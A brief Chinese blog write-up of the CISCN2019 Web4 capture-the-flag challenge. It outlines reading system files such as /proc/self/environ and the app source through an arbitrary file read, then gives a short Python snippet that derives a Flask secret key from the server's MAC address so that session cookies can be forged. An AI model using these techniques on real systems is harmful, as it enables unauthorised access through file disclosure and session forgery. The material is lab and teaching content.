CTF

[CISCN2019 华东南赛区]Web4(flask伪造sessin)

Posted on 2020-03-11,1 min read

任意文件读取。这个就不说了
读取/proc/self/environ得到路径/app
读取/app/app.py得到源码

过于简单。就不说了。读/sys/class/net/eth0/address

import random
mac="02:42:ae:00:fb:f8"
random.seed(int(mac.replace(":", ""), 16))
key = str(random.random() * 233)
print key

得到key138.496124035
用python2加密下数据。替换不行。。
用python3加密下数据。就好了

下一篇: [Black Watch 入群题]Web(简单的sql盲注)→